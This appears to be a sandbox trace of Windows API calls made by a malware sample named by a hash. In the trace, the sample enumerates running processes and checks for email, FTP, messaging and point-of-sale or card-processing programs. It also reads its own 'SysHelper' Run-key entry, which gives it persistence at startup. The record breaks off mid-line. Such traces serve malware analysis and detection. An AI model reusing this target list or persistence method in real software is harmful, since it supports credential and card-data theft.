[0098.567] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.569] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="disease.exe") returned 0xb [0098.569] CloseHandle (hObject=0x4e8) returned 1 [0098.569] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x4e8 [0098.569] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.570] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="during_violence.exe") returned 0x13 [0098.570] CloseHandle (hObject=0x4e8) returned 1 [0098.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x4e8 [0098.571] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.572] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="action.exe") returned 0xa [0098.572] CloseHandle (hObject=0x4e8) returned 1 [0098.572] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x4e8 [0098.572] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.574] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0098.574] CloseHandle (hObject=0x4e8) returned 1 [0098.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x4e8 [0098.574] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.575] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0098.576] CloseHandle (hObject=0x4e8) returned 1 [0098.576] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc8) returned 0x4e8 [0098.576] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.577] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0098.577] CloseHandle (hObject=0x4e8) returned 1 [0098.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd0) returned 0x4e8 [0098.577] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.579] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaa0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0098.580] CloseHandle (hObject=0x4e8) returned 1 [0098.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x4e8 [0098.580] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.581] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0098.581] CloseHandle (hObject=0x4e8) returned 1 [0098.581] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe0) returned 0x4e8 [0098.581] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.583] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0098.583] CloseHandle (hObject=0x4e8) returned 1 [0098.583] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe8) returned 0x4e8 [0098.583] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.584] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x800000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0098.584] CloseHandle (hObject=0x4e8) returned 1 [0098.585] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x4e8 [0098.585] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.586] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x920000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0098.586] CloseHandle (hObject=0x4e8) returned 1 [0098.586] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x4e8 [0098.586] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.587] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1020000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0098.588] CloseHandle (hObject=0x4e8) returned 1 [0098.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e0) returned 0x4e8 [0098.588] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.589] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x380000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0098.590] CloseHandle (hObject=0x4e8) returned 1 [0098.590] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x4e8 [0098.590] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.591] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0098.592] CloseHandle (hObject=0x4e8) returned 1 [0098.592] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d0) returned 0x4e8 [0098.592] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.593] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0098.593] CloseHandle (hObject=0x4e8) returned 1 [0098.593] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x324) returned 0x4e8 [0098.593] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.595] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0098.595] CloseHandle (hObject=0x4e8) returned 1 [0098.595] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x4e8 [0098.595] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.596] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0098.597] CloseHandle (hObject=0x4e8) returned 1 [0098.597] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x224) returned 0x4e8 [0098.597] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.598] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb90000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0098.598] CloseHandle (hObject=0x4e8) returned 1 [0098.598] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x4e8 [0098.598] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.600] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0098.600] CloseHandle (hObject=0x4e8) returned 1 [0098.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x284) returned 0x4e8 [0098.600] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.601] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0098.602] CloseHandle (hObject=0x4e8) returned 1 [0098.602] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x4e8 [0098.602] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.603] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0098.603] CloseHandle (hObject=0x4e8) returned 1 [0098.603] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x4e8 [0098.604] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.605] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0098.605] CloseHandle (hObject=0x4e8) returned 1 [0098.605] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x4e8 [0098.605] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.607] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x160000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0098.607] CloseHandle (hObject=0x4e8) returned 1 [0098.607] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x4e8 [0098.607] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.608] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0098.609] CloseHandle (hObject=0x4e8) returned 1 [0098.609] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x4e8 [0098.609] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.610] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0098.610] CloseHandle (hObject=0x4e8) returned 1 [0098.610] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x4e8 [0098.610] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.612] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0098.612] CloseHandle (hObject=0x4e8) returned 1 [0098.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x4e8 [0098.612] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.613] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xdf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0098.614] CloseHandle (hObject=0x4e8) returned 1 [0098.614] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x4e8 [0098.614] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.615] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1290000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0098.615] CloseHandle (hObject=0x4e8) returned 1 [0098.616] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x4e8 [0098.616] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.617] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0098.617] CloseHandle (hObject=0x4e8) returned 1 [0098.617] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x4e8 [0098.617] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.619] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0098.619] CloseHandle (hObject=0x4e8) returned 1 [0098.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae4) returned 0x4e8 [0098.619] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.620] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0098.622] CloseHandle (hObject=0x4e8) returned 1 [0098.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaec) returned 0x4e8 [0098.623] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.624] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="consumer_door.exe") returned 0x11 [0098.624] CloseHandle (hObject=0x4e8) returned 1 [0098.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x4e8 [0098.624] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.626] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="too_no.exe") returned 0xa [0098.626] CloseHandle (hObject=0x4e8) returned 1 [0098.626] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb14) returned 0x4e8 [0098.626] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.627] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x900000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pass.exe") returned 0x8 [0098.628] CloseHandle (hObject=0x4e8) returned 1 [0098.628] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb1c) returned 0x4e8 [0098.628] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.629] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1070000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0098.629] CloseHandle (hObject=0x4e8) returned 1 [0098.630] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb24) returned 0x4e8 [0098.630] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.631] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1070000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0098.631] CloseHandle (hObject=0x4e8) returned 1 [0098.631] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb2c) returned 0x4e8 [0098.631] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.633] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0098.633] CloseHandle (hObject=0x4e8) returned 1 [0098.633] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb34) returned 0x4e8 [0098.633] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.634] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x130000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0098.635] CloseHandle (hObject=0x4e8) returned 1 [0098.635] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb3c) returned 0x4e8 [0098.635] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.636] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x820000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0098.636] CloseHandle (hObject=0x4e8) returned 1 [0098.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb44) returned 0x4e8 [0098.636] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.638] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x13a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0098.638] CloseHandle (hObject=0x4e8) returned 1 [0098.638] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb4c) returned 0x4e8 [0098.638] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.639] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xcb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0098.640] CloseHandle (hObject=0x4e8) returned 1 [0098.640] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb54) returned 0x4e8 [0098.640] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.641] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1080000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0098.641] CloseHandle (hObject=0x4e8) returned 1 [0098.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb5c) returned 0x4e8 [0098.642] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.643] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1160000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0098.643] CloseHandle (hObject=0x4e8) returned 1 [0098.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb64) returned 0x4e8 [0098.643] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.644] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x100000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0098.645] CloseHandle (hObject=0x4e8) returned 1 [0098.645] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e8 [0098.645] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.646] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xaf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0098.646] CloseHandle (hObject=0x4e8) returned 1 [0098.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4e8 [0098.646] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.648] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x12b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0098.648] CloseHandle (hObject=0x4e8) returned 1 [0098.648] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x4e8 [0098.648] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.649] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0098.650] CloseHandle (hObject=0x4e8) returned 1 [0098.650] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x4e8 [0098.650] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.651] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x880000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0098.651] CloseHandle (hObject=0x4e8) returned 1 [0098.651] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x4e8 [0098.651] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.653] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0098.653] CloseHandle (hObject=0x4e8) returned 1 [0098.653] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc50) returned 0x0 [0098.653] CloseHandle (hObject=0x0) returned 0 [0098.653] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc70) returned 0x0 [0098.654] CloseHandle (hObject=0x0) returned 0 [0098.654] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe50) returned 0x0 [0098.654] CloseHandle (hObject=0x0) returned 0 [0098.654] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf2c) returned 0x4e8 [0098.654] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.655] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 0x44 [0098.655] CloseHandle (hObject=0x4e8) returned 1 [0098.663] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x619ec0 [0098.663] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b830c0 [0098.663] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6dac8 [0098.663] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6dd30 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6df98 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6e200 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6e468 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6e6d0 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6e938 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6eba0 [0098.664] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25c) returned 0x2b6ee08 [0098.672] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0098.672] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0098.672] RegCloseKey (hKey=0x4e8) returned 0x0 [0098.673] RtlAllocateHeap 